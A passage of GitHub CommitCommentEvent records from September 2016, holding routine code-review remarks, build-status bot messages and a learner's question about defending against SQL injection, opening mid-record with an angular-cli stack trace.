Module._compile (module.js:409:26)\r\n> C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config\\config.ts:23\r\n>         this._config = new (schema_class_factory_1.SchemaClassFactory(schema))(configJson, ...fallbacks);\r\n>                                                                                            ^^^\r\n> \r\n> SyntaxError: Unexpected token ...\r\n>     at exports.runInThisContext (vm.js:53:16)\r\n>     at Module._compile (module.js:373:25)\r\n>     at Object.require.extensions..ts (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:30:14)\r\n>     at Module.load (module.js:343:32)\r\n>     at Function.Module._load (module.js:300:12)\r\n>     at Function.Module._load (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:55:22)\r\n>     at Module.require (module.js:353:17)\r\n>     at require (internal/module.js:12:17)\r\n>     at Object.<anonymous> (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config.ts:7:16)\r\n>     at Module._compile (module.js:409:26)"}},"created_at":"2016-09-07T17:46:51Z"}
{"id":"4529213995","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18932361,"position":83,"line":87,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T17:46:58Z","updated_at":"2016-09-07T17:46:58Z","body":"There isn't a clear distinction between the AKE exchange and the conversation start/data message exchange. "}},"created_at":"2016-09-07T17:46:58Z"}
{"id":"4529216055","type":"CommitCommentEvent","actor":{"login":"mpiecora"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18932367,"position":null,"line":null,"path":null,"commit_id":"1691f3fd8db312cb450ad33968a2a0b061280023","created_at":"2016-09-07T17:47:21Z","updated_at":"2016-09-07T17:47:21Z","body":"Awesome, I'll try as soon as I get home from work today! I really think this is great, I appreciate folks like you. So good job Maurice! :D"}},"created_at":"2016-09-07T17:47:21Z"}
{"id":"4529216687","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18932370,"position":null,"line":null,"path":null,"commit_id":"be679bd9028e929852f073fd2a05ea4a0dec5a76","created_at":"2016-09-07T17:47:28Z","updated_at":"2016-09-07T17:47:28Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#EoicgKduR7O4-aw8HzofBA"}},"created_at":"2016-09-07T17:47:28Z"}
{"id":"4529217605","type":"CommitCommentEvent","actor":{"login":"PeteJodo"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18932372,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:47:38Z","updated_at":"2016-09-07T17:47:38Z","body":"https://github.com/PeteJodo/fluxible-redux-dispatcher/pull/1"}},"created_at":"2016-09-07T17:47:38Z"}
{"id":"4529220181","type":"CommitCommentEvent","actor":{"login":"thoughtless"},"repo":{"name":"polleverywhere/quebert"},"payload":{"comment":{"id":18932373,"position":null,"line":null,"path":null,"commit_id":"7dab94ab95a3d87de87d7e8675f5704079bf2618","created_at":"2016-09-07T17:48:09Z","updated_at":"2016-09-07T17:48:09Z","body":"I'm fine with dropping support for Ruby 2.1.x since that version only gets security fixes now. It no longer gets bug fixes."}},"created_at":"2016-09-07T17:48:09Z"}
{"id":"4529227922","type":"CommitCommentEvent","actor":{"login":"kalidasya"},"repo":{"name":"SonarQubeCommunity/sonar-css"},"payload":{"comment":{"id":18932392,"position":null,"line":null,"path":null,"commit_id":"58d3493abdb201c1fb6a82be2615cf1ce9ddf4dd","created_at":"2016-09-07T17:49:36Z","updated_at":"2016-09-07T17:49:36Z","body":"yeah, sure, indeed they have mentioned something years ago."}},"created_at":"2016-09-07T17:49:36Z"}
{"id":"4529229651","type":"CommitCommentEvent","actor":{"login":"mauricetmeyer"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18932395,"position":null,"line":null,"path":null,"commit_id":"1691f3fd8db312cb450ad33968a2a0b061280023","created_at":"2016-09-07T17:49:57Z","updated_at":"2016-09-07T17:49:57Z","body":"@mpiecora Right now I'm trying to get text to display on the OP-1 screen"}},"created_at":"2016-09-07T17:49:57Z"}
{"id":"4529230627","type":"CommitCommentEvent","actor":{"login":"mauricetmeyer"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18932397,"position":null,"line":null,"path":null,"commit_id":"1691f3fd8db312cb450ad33968a2a0b061280023","created_at":"2016-09-07T17:50:11Z","updated_at":"2016-09-07T17:50:11Z","body":"Also thank you for the kind words."}},"created_at":"2016-09-07T17:50:11Z"}
{"id":"4529236696","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18932415,"position":49,"line":49,"path":"scripts/album.js","commit_id":"bdb0240a48a4baec8545809ead68a2dd8d03f603","created_at":"2016-09-07T17:51:14Z","updated_at":"2016-09-07T17:51:14Z","body":"I was trying to make the line shorter. I will fix it."}},"created_at":"2016-09-07T17:51:14Z"}
{"id":"4529238439","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"kisey/video-courses"},"payload":{"comment":{"id":18932419,"position":14,"line":13,"path":"public/app/ks-form/ks-form.ctrl.js","commit_id":"f2c5d99afd85ee6a3b9a4085d2a6aef9c2324dbc","created_at":"2016-09-07T17:51:32Z","updated_at":"2016-09-07T17:51:32Z","body":"confirmWorld ?"}},"created_at":"2016-09-07T17:51:32Z"}
{"id":"4529245754","type":"CommitCommentEvent","actor":{"login":"eNRIQUEsILES"},"repo":{"name":"eNRIQUEsILES/DDBB-Maintenance-NetFx452"},"payload":{"comment":{"id":18932437,"position":null,"line":null,"path":null,"commit_id":"b220920d9516bc319a8266ab65a3fff57459588b","created_at":"2016-09-07T17:52:53Z","updated_at":"2016-09-07T17:52:53Z","body":"Inici de repo"}},"created_at":"2016-09-07T17:52:53Z"}
{"id":"4529248354","type":"CommitCommentEvent","actor":{"login":"d00p"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18932443,"position":69,"line":161,"path":"scripts/jobs/cron_letsencrypt.php","commit_id":"e4887362ec33d6ee191a0df27303ea74de05d54e","created_at":"2016-09-07T17:53:23Z","updated_at":"2016-09-07T17:53:23Z","body":"Can you check what the query \r\n`SELECT * FROM `domain_ssl_settings`\r\nWHERE `domainid` = '0' AND\r\n(`expirationdate` < DATE_ADD(NOW(), INTERVAL 30 DAY) OR `expirationdate` IS NULL)`\r\noutputs after the (first) cronrun where a Let's Encrypt cert should've been created? Because the certrow['id'] should be set to the ID if this record"}},"created_at":"2016-09-07T17:53:23Z"}
{"id":"4529254886","type":"CommitCommentEvent","actor":{"login":"Tobias-Fischer"},"repo":{"name":"robotology/wysiwyd"},"payload":{"comment":{"id":18932490,"position":null,"line":null,"path":null,"commit_id":"b2a3af9fee4296104d7888e7b67e91d313d8e090","created_at":"2016-09-07T17:54:39Z","updated_at":"2016-09-07T17:54:39Z","body":"Thanks @pattacini!"}},"created_at":"2016-09-07T17:54:39Z"}
{"id":"4529261474","type":"CommitCommentEvent","actor":{"login":"Tobias-Fischer"},"repo":{"name":"robotology/wysiwyd"},"payload":{"comment":{"id":18932501,"position":null,"line":null,"path":null,"commit_id":"b2a3af9fee4296104d7888e7b67e91d313d8e090","created_at":"2016-09-07T17:55:47Z","updated_at":"2016-09-07T17:55:47Z","body":"Thanks @pattacini!"}},"created_at":"2016-09-07T17:55:47Z"}
{"id":"4529261951","type":"CommitCommentEvent","actor":{"login":"rfazi"},"repo":{"name":"ChadCSong/ShineButton"},"payload":{"comment":{"id":18932502,"position":9,"line":116,"path":"shinebuttonlib/src/main/java/com/sackcentury/shinebuttonlib/ShineButton.java","commit_id":"4574d470137e52af84965cbe65ec71fefb4e780b","created_at":"2016-09-07T17:55:51Z","updated_at":"2016-09-07T17:55:51Z","body":"Remove this because 'isChecked = checked;' do the work."}},"created_at":"2016-09-07T17:55:51Z"}
{"id":"4529262533","type":"CommitCommentEvent","actor":{"login":"rfazi"},"repo":{"name":"ChadCSong/ShineButton"},"payload":{"comment":{"id":18932503,"position":13,"line":120,"path":"shinebuttonlib/src/main/java/com/sackcentury/shinebuttonlib/ShineButton.java","commit_id":"4574d470137e52af84965cbe65ec71fefb4e780b","created_at":"2016-09-07T17:55:57Z","updated_at":"2016-09-07T17:55:57Z","body":"Remove this because 'isChecked = checked;' do the work."}},"created_at":"2016-09-07T17:55:57Z"}
{"id":"4529266407","type":"CommitCommentEvent","actor":{"login":"emk"},"repo":{"name":"emk/docker_compose-rs"},"payload":{"comment":{"id":18932514,"position":null,"line":null,"path":null,"commit_id":"8b906621030ca763e1f09a32c775ca9a872b3ad0","created_at":"2016-09-07T17:56:35Z","updated_at":"2016-09-07T17:56:35Z","body":"@dkastner I implemened `docker-compose.yml` override merging so we can do it without going through `docker-compose`. A good starting point is [here](https://github.com/emk/docker_compose-rs/commit/8b906621030ca763e1f09a32c775ca9a872b3ad0#diff-124bba3936f975cdb851084c17d5a8dbR1). This is a moderately fancy bit of Rust programming using generic traits and a couple of macros to specify how to merge some pretty complex data structures. Feel free to mark spots that could use more clarification."}},"created_at":"2016-09-07T17:56:35Z"}
{"id":"4529271067","type":"CommitCommentEvent","actor":{"login":"chaser24"},"repo":{"name":"chaser24/test_project"},"payload":{"comment":{"id":18932524,"position":null,"line":null,"path":null,"commit_id":"6b29b541dd1d80acebb39779781cefab2512f51d","created_at":"2016-09-07T17:57:15Z","updated_at":"2016-09-07T17:57:15Z","body":"Thanks"}},"created_at":"2016-09-07T17:57:15Z"}
{"id":"4529274154","type":"CommitCommentEvent","actor":{"login":"coke11"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":18932531,"position":null,"line":null,"path":null,"commit_id":"062d35f0cf8b03ef23202eb3303cf61ed15c11cc","created_at":"2016-09-07T17:57:43Z","updated_at":"2016-09-07T17:57:43Z","body":"What does the Easter egg do? Too lazy to test on mobile...."}},"created_at":"2016-09-07T17:57:43Z"}
{"id":"4529278414","type":"CommitCommentEvent","actor":{"login":"PerBothner"},"repo":{"name":"jline/jline3"},"payload":{"comment":{"id":18932537,"position":null,"line":null,"path":null,"commit_id":"27c7827c47a6863180436bb12e57a9d4b52e6084","created_at":"2016-09-07T17:58:23Z","updated_at":"2016-09-07T17:58:23Z","body":"The INT signal is caught by the handler registered in the PosixSysTerminal constructor.  That delegates to the AbstractTerminal.raise method. If no handler has been registered, that calls handleDefaultSignal, which ignores the signal.\r\n\r\nI agree the user is responsible for catching and handling it appropriately.   However, when the user does nothing, the behavior should be the same as if not using jline - i.e. the system default.  Or more generally whatever signal handler was installed *before* creating the PosixSysTerminal.\r\n\r\nThe default behavior for the INT signal is and should be to terminate the process.  Ignoring the signal is wrong.\r\n\r\n\"_given ReadLineImpl handles the signal correctly_\"\r\n\r\nYes, while readLine is active.  I'm concerned about what happens after readLine returns.  I.e. we're dong the \"eval\" part of REPL."}},"created_at":"2016-09-07T17:58:23Z"}
{"id":"4529279952","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"dktapps/LevelEventFinder"},"payload":{"comment":{"id":18932539,"position":null,"line":null,"path":null,"commit_id":"f260636544a656a4196b66034dcd49d76c0053e4","created_at":"2016-09-07T17:58:38Z","updated_at":"2016-09-07T17:58:38Z","body":"¯\\_(ツ)_/¯"}},"created_at":"2016-09-07T17:58:38Z"}
{"id":"4529280174","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18932540,"position":null,"line":null,"path":null,"commit_id":"9ded3d102588c977142e00842b1232ce06ca6aa8","created_at":"2016-09-07T17:58:40Z","updated_at":"2016-09-07T17:58:40Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.760.9ded3d102588c977142e00842b1232ce06ca6aa8](http://build.palaso.org/viewLog.html?buildId=76521&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:08"}},"created_at":"2016-09-07T17:58:40Z"}
{"id":"4529283469","type":"CommitCommentEvent","actor":{"login":"davidsbond"},"repo":{"name":"davidsbond/distributr"},"payload":{"comment":{"id":18932547,"position":null,"line":null,"path":null,"commit_id":"935221cac0703246e0a442f783b5704673fda8de","created_at":"2016-09-07T17:59:12Z","updated_at":"2016-09-07T17:59:12Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TC5B63nQ&#x2F;2-create-method-for-sending-files-to-chunk-node\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create method for sending files to chunk node</a>"}},"created_at":"2016-09-07T17:59:12Z"}
{"id":"4529283473","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18932548,"position":50,"line":58,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T17:59:12Z","updated_at":"2016-09-07T17:59:12Z","body":"Should we put security properties into a separate section? "}},"created_at":"2016-09-07T17:59:12Z"}
{"id":"4529284584","type":"CommitCommentEvent","actor":{"login":"soezdemir"},"repo":{"name":"htwsoft/VS1"},"payload":{"comment":{"id":18932550,"position":null,"line":null,"path":null,"commit_id":"144f533b21fc7b26fc59741f387347b5488d7c4a","created_at":"2016-09-07T17:59:23Z","updated_at":"2016-09-07T17:59:23Z","body":"should be merged\r\n"}},"created_at":"2016-09-07T17:59:23Z"}
{"id":"4529285261","type":"CommitCommentEvent","actor":{"login":"davidsbond"},"repo":{"name":"davidsbond/distributr"},"payload":{"comment":{"id":18932553,"position":null,"line":null,"path":null,"commit_id":"935221cac0703246e0a442f783b5704673fda8de","created_at":"2016-09-07T17:59:31Z","updated_at":"2016-09-07T17:59:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TC5B63nQ&#x2F;2-create-method-for-sending-files-to-chunk-node\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create method for sending files to chunk node</a>"}},"created_at":"2016-09-07T17:59:31Z"}
{"id":"4529286555","type":"CommitCommentEvent","actor":{"login":"davidsbond"},"repo":{"name":"davidsbond/distributr"},"payload":{"comment":{"id":18932559,"position":null,"line":null,"path":null,"commit_id":"935221cac0703246e0a442f783b5704673fda8de","created_at":"2016-09-07T17:59:47Z","updated_at":"2016-09-07T17:59:47Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TC5B63nQ&#x2F;2-create-method-for-sending-files-to-chunk-node\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create method for sending files to chunk node</a>"}},"created_at":"2016-09-07T17:59:47Z"}
{"id":"4529287465","type":"CommitCommentEvent","actor":{"login":"davidsbond"},"repo":{"name":"davidsbond/distributr"},"payload":{"comment":{"id":18932563,"position":null,"line":null,"path":null,"commit_id":"ea8ee968d492ef0f3639b98b1a8d3b5ef34329a7","created_at":"2016-09-07T17:59:59Z","updated_at":"2016-09-07T17:59:59Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TC5B63nQ&#x2F;2-create-method-for-sending-files-to-chunk-node\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create method for sending files to chunk node</a>"}},"created_at":"2016-09-07T17:59:59Z"}
{"id":"4529292470","type":"CommitCommentEvent","actor":{"login":"sdgathman"},"repo":{"name":"hellerbarde/stapler"},"payload":{"comment":{"id":18932574,"position":null,"line":null,"path":null,"commit_id":"1eb0ca6ec99fc5f3e39342109b18f098d3ffe17d","created_at":"2016-09-07T18:00:58Z","updated_at":"2016-09-07T18:00:58Z","body":"Hmm.  \"grep more_itertools *.py returns only the import."}},"created_at":"2016-09-07T18:00:58Z"}
{"id":"4529293352","type":"CommitCommentEvent","actor":{"login":"Sqreamplex"},"repo":{"name":"Sqreamplex/1.tund-1-ruhm"},"payload":{"comment":{"id":18932579,"position":7,"line":7,"path":"README.md","commit_id":"2588d24773115c2564500a34b3450e2750460b30","created_at":"2016-09-07T18:01:07Z","updated_at":"2016-09-07T18:01:07Z","body":"sreewrtwe"}},"created_at":"2016-09-07T18:01:07Z"}
{"id":"4529294444","type":"CommitCommentEvent","actor":{"login":"wenkesj"},"repo":{"name":"austinkelleher/dynograte"},"payload":{"comment":{"id":18932584,"position":null,"line":null,"path":null,"commit_id":"e2b3db61ed2747f672c52c19f2dcd228fa7f5b6d","created_at":"2016-09-07T18:01:18Z","updated_at":"2016-09-07T18:01:18Z","body":"Should this be: `Migration` -> `Migrating` | `Migration` & `Migration` -> `Migrate`"}},"created_at":"2016-09-07T18:01:18Z"}
{"id":"4529294584","type":"CommitCommentEvent","actor":{"login":"urlfixe"},"repo":{"name":"urlfixe/pre1"},"payload":{"comment":{"id":18932585,"position":null,"line":null,"path":null,"commit_id":"f209500f70f5cddc4c2adbc9c16abb4107b6256c","created_at":"2016-09-07T18:01:20Z","updated_at":"2016-09-07T18:01:20Z","body":"recuperacio"}},"created_at":"2016-09-07T18:01:20Z"}
{"id":"4529296344","type":"CommitCommentEvent","actor":{"login":"norwood"},"repo":{"name":"norwood/kafka"},"payload":{"comment":{"id":18932592,"position":26,"line":139,"path":"streams/src/main/java/org/apache/kafka/streams/processor/internals/ProcessorStateManager.java","commit_id":"643a4a59826a6383fd5c1408f21eefe6cf994752","created_at":"2016-09-07T18:01:40Z","updated_at":"2016-09-07T18:01:40Z","body":"sure. actually i was going to just move the `this.stores.put(storeName, store);` up above this, then bail out, but i wasn't sure if that was dependent on the partition ready check. would that work?"}},"created_at":"2016-09-07T18:01:40Z"}
{"id":"4529296780","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18932593,"position":15,"line":23,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T18:01:45Z","updated_at":"2016-09-07T18:01:45Z","body":"We should probably have a section for definitions, data types, etc. "}},"created_at":"2016-09-07T18:01:45Z"}
{"id":"4529299785","type":"CommitCommentEvent","actor":{"login":"BeschtaBrandon"},"repo":{"name":"BeschtaBrandon/BeschtaBrandon.github.io"},"payload":{"comment":{"id":18932594,"position":5,"line":33,"path":"experience.html","commit_id":"57474f618b8aafa3ead5df2bf1523293991558df","created_at":"2016-09-07T18:02:18Z","updated_at":"2016-09-07T18:02:18Z","body":"@colinharris05 check it out"}},"created_at":"2016-09-07T18:02:18Z"}
{"id":"4529302201","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18932599,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-07T18:02:45Z","updated_at":"2016-09-07T18:02:45Z","body":"こちら、ご指摘ありがとうございます。\r\nSQLインジェクションとその対策について、正直半分も理解出来ていない感じがあるのですが、\r\nものすごくざっくりですと、下記のような認識で合っていますでしょうか？\r\n\r\n=======================================\r\n\r\nSQLインジェクションとは？\r\n\r\n『SELECT * FROM books WHERE author='O'Reilly'』\r\n\r\n＜その①＞\r\n例えば、上記のようなSQL構文で、'O'Reilly’のような『 ‘ 』入の文字列が入ると、\r\nサーバーが閉じタグと勘違いして『Reilly’』の部分がはみ出してしまう\r\n➔エラーが出る\r\n➔場合によっては外部に出ては行けないデータが出力されてしまう。\r\n\r\n＜その②＞\r\nだからそもそも変な値が入らないように制限したり、入ってもちゃんと処理できる（エスケープ）ようにしておく必要がある。\r\n\r\n＜その③＞\r\nでもそれってデータベースの種類によって設定が違ったりして大変。\r\n\r\n＜その④＞\r\nだから下記のような方法があります。\r\n方法①（ try-catch ）で例外処理をして、変な値が入力されないようにする。\r\n方法②安全なSQL呼び出しメソッドを使う（PHPならPear::MDB2）\r\nhttps://www.ipa.go.jp/files/000017320.pdf\r\nPEAR MDB2の使い方\r\nhttp://qiita.com/oh_rusty_nail/items/62006a1aae46f16b0b88\r\n\r\n=======================================\r\n\r\nそして、元々のtry~catchのコードでは上記方法①のやり方で対策している形でしょうか。\r\n"}},"created_at":"2016-09-07T18:02:45Z"}
{"id":"4529302952","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18932601,"position":237,"line":494,"path":"src/web/js/trove/d3-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-07T18:02:53Z","updated_at":"2016-09-07T18:02:53Z","body":"@sorawee can you explain when `restarter` will be `nothing`?  It seems like the idea is that initially, the stack gets paused, but when the stack is already paused, it simply calls the callback directly, and this is controlled by the `restarter` parameter.\r\n\r\nAn issue I see is that if `restarter` is `nothing`, and `interact` is true, then this function may try to call `pauseStack` when there is no stack running.  The `interact` pause will trigger on line 474, and then another pause will trigger on 500 before the first has restarted.  That seems like a bug on my first reading."}},"created_at":"2016-09-07T18:02:53Z"}
{"id":"4529303444","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932603,"position":22,"line":13,"path":"examples/av_classifications_example.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:02:58Z","updated_at":"2016-09-07T18:02:58Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:02:58Z"}
{"id":"4529303892","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18932605,"position":null,"line":null,"path":null,"commit_id":"9ded3d102588c977142e00842b1232ce06ca6aa8","created_at":"2016-09-07T18:03:05Z","updated_at":"2016-09-07T18:03:05Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.760.9ded3d102588c977142e00842b1232ce06ca6aa8](http://build.palaso.org/viewLog.html?buildId=76522&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:08:28"}},"created_at":"2016-09-07T18:03:05Z"}
{"id":"4529305820","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932612,"position":24,"line":15,"path":"examples/av_classifications_example.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:03:28Z","updated_at":"2016-09-07T18:03:28Z","body":"CybOX 3.0 doesn't allow for embedded objects, so this should actually just be a reference to the ID of a separate Directory Object that has these properties."}},"created_at":"2016-09-07T18:03:28Z"}
{"id":"4529308212","type":"CommitCommentEvent","actor":{"login":"sdgathman"},"repo":{"name":"hellerbarde/stapler"},"payload":{"comment":{"id":18932623,"position":null,"line":null,"path":null,"commit_id":"1eb0ca6ec99fc5f3e39342109b18f098d3ffe17d","created_at":"2016-09-07T18:03:56Z","updated_at":"2016-09-07T18:03:56Z","body":"Ah, the Fedora version doesn't use more_itertools, and no Fedora package supplies more_itertools.  That could be a barrier to tracking upstream."}},"created_at":"2016-09-07T18:03:56Z"}
{"id":"4529308702","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932626,"position":33,"line":24,"path":"examples/av_classifications_example.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:04:02Z","updated_at":"2016-09-07T18:04:02Z","body":"This should be \"extended_properties\":{\"maec-av-class\":[...AV classfications go here...]}"}},"created_at":"2016-09-07T18:04:02Z"}
{"id":"4529311839","type":"CommitCommentEvent","actor":{"login":"canitzp"},"repo":{"name":"MrRiegel/Storage-Network"},"payload":{"comment":{"id":18932637,"position":11,"line":29,"path":"src/main/java/mrriegel/storagenetwork/blocks/BlockConnectable.java","commit_id":"db5bd71fdf16bba58a2fcc5f82b5c364e6419d68","created_at":"2016-09-07T18:04:42Z","updated_at":"2016-09-07T18:04:42Z","body":"Can you please use worldIn.isAirBLock(blockIn) because otherwise blocks that are designed as air block aren't detected, linke the fake air from flood lights"}},"created_at":"2016-09-07T18:04:42Z"}
{"id":"4529313811","type":"CommitCommentEvent","actor":{"login":"GreenLunar"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":18932642,"position":null,"line":null,"path":null,"commit_id":"ce371f766a724bae26acb2221d0e1daef8acad5b","created_at":"2016-09-07T18:05:07Z","updated_at":"2016-09-07T18:05:07Z","body":"Please notify translators, before an upcoming release, next time."}},"created_at":"2016-09-07T18:05:07Z"}
{"id":"4529315802","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932645,"position":14,"line":25,"path":"examples/maec_related_malware.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:05:27Z","updated_at":"2016-09-07T18:05:27Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:05:27Z"}
{"id":"4529316438","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932648,"position":27,"line":34,"path":"examples/maec_related_malware.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:05:35Z","updated_at":"2016-09-07T18:05:35Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:05:35Z"}
{"id":"4529316741","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932651,"position":36,"line":39,"path":"examples/maec_related_malware.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:05:39Z","updated_at":"2016-09-07T18:05:39Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:05:39Z"}
{"id":"4529317168","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932653,"position":45,"line":44,"path":"examples/maec_related_malware.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:05:43Z","updated_at":"2016-09-07T18:05:43Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:05:43Z"}
{"id":"4529317697","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932655,"position":19,"line":119,"path":"examples/package_action_equivalency_example.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:05:49Z","updated_at":"2016-09-07T18:05:49Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:05:49Z"}
{"id":"4529318221","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932657,"position":37,"line":133,"path":"examples/package_action_equivalency_example.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:05:54Z","updated_at":"2016-09-07T18:05:54Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:05:54Z"}
{"id":"4529318731","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932660,"position":50,"line":142,"path":"examples/package_action_equivalency_example.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:05:59Z","updated_at":"2016-09-07T18:05:59Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:05:59Z"}
{"id":"4529319585","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18932663,"position":21,"line":42,"path":"examples/static_triage_example.json","commit_id":"4c76d17c113f1ec450654f9a9992fae2711373fd","created_at":"2016-09-07T18:06:11Z","updated_at":"2016-09-07T18:06:11Z","body":"This should be \"type\":\"file\" to match the corresponding field in the CybOX 3.0 File Object spec."}},"created_at":"2016-09-07T18:06:11Z"}
{"id":"4529321939","type":"CommitCommentEvent","actor":{"login":"Martinsos"},"repo":{"name":"kabuhr/edlib"},"payload":{"comment":{"id":18932670,"position":1,"line":1,"path":"contrib/haskell/.gitignore","commit_id":"875c51d3eb5e9420c3adcddc1bf15eb3193d8097","created_at":"2016-09-07T18:06:34Z","updated_at":"2016-09-07T18:06:34Z","body":"@kabuhr I did not expect that answer, but great nevertheless :)! I guess that Edlib is a good example since it has no side-efects?  I believe that is actually not a coincidence, because since I started using Haskell I tend to write all my code in that way when possible :).\r\nThanks again for the effort, and please please feel free to create a PR when you believe it is ready - it will be easier to version/update it correctly + you will be a contributor!"}},"created_at":"2016-09-07T18:06:34Z"}
